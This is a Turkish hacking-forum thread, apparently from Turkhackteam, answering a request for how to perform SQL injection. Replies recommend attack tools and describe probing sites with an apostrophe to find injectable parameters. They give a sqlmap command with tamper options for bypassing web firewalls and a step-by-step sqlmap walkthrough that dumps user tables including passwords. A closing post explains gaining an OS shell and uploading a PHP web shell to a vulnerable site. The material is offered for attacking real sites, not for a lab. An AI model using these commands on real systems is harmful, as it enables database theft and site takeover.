Sql Injection Nasıl yapılır ?

Çözüm
Merhaba, sql injection hakkında yardımcı olabilecek var mı acaba?
Kod olur, program olur, script olur..
Kod:
(Youtube'ta sqlmap kurulumu yazarak nasıl kurulduğuna bakabilirsin)


Program:
Safe3,Havij,Acunetix


Syntax hatası sql açığı olduğunu belirtir onu bulmak daha kolaydır sitenin bağlantısındaki herhangi bir sayının sonuna kesme işareti(')koyunca herhangi bir hata veriyorsa açık vardır

Eğer yararlı bulduysan çözüldü olarak işaretlersen güzel olur🙂🙂🙂


sqlmap var kalide araştır onu waf kırma kodunu bulamazsan waf kırma kodu bu= --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase"...

L0HXT

Üye
5 Eyl 2021
186
44
24

The Gölge

Katılımcı Üye


Merhabalar,
Forumumuzda açılmış olan çok güzel konular mevcut

SQL Injection ile ilgili sabite alınmış Türkçe yararlı kaynaklardır. Okumanızı tavsiye ederim.
İyi Forumlar.

 

leon311

Katılımcı Üye
20 Kas 2021
395
124
Merhaba, sql injection hakkında yardımcı olabilecek var mı acaba?
Kod olur, program olur, script olur..
Kod:
(Youtube'ta sqlmap kurulumu yazarak nasıl kurulduğuna bakabilirsin)


Program:
Safe3,Havij,Acunetix


Syntax hatası sql açığı olduğunu belirtir onu bulmak daha kolaydır sitenin bağlantısındaki herhangi bir sayının sonuna kesme işareti(')koyunca herhangi bir hata veriyorsa açık vardır

Eğer yararlı bulduysan çözüldü olarak işaretlersen güzel olur🙂🙂🙂


sqlmap var kalide araştır onu waf kırma kodunu bulamazsan waf kırma kodu bu= --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs --random-agent --no-cast
Hocam waf kırma kodlarını nereden buluyorsunuz?

root@kali > sqlmap -u www.site.com/sqlaçıklısayfa --dbs (link örneği: www.site.com/sql.php?id=192)

*db bulundu* sonrası:

root@kali > sqlmap -u www.site.com/sqlaçıklısayfa -D -bulunandbninadı --tables

sonrası:

--------------örnek tablo------

users
photos
videos


tablolar




-------------------------------

sonra:

root@kali > sqlmap -u www.site.com/sqlaçıklısayfa -D -bulunandbninadı -T users --columns

------örnek tablo----------
username varchar(20)
password varchar(50)
phonenumber int (15)
---------------------------

*tablo içeriği ekrana yazdırıldı* sonrası:


root@kali > sqlmap -u www.site.com/sqlaçıklısayfa -D bulunandbninadı -T users -C username,password --dump

the end:

------örnek tablo-----
username password
ahmet asd123

İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.


Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;

Normalde bu kodu kullanıyorduk;

sqlmap -u "www.sqlaciklisite.com/php?id=" --dbs

Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;

Kullanacağımız Kodumuz:

sqlmap -u "www.sqlaciklisite.com/php?id=" --current-user --is-dba

komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;


Kodumuz:

--> current user is DBA : True <--


Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;

Kodumuz:

sqlmap -u "www.sqlaciklisite.com/php?id=" --os-shell

Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.;




Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;

(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)

|1|ASP
|2|PHP
|3|ASPX
|4|JSP

Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz "php" diliyle yazılmış çünkü.

Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.


İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp

enter tuşuna basmamız yeterlidir Örnek olarak;


Sitemizin adresi:


Buraya upload ediyoruz mesela, shellimizin adı k2.php olsun


Sitemizin adresi:

 
Çözüm
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.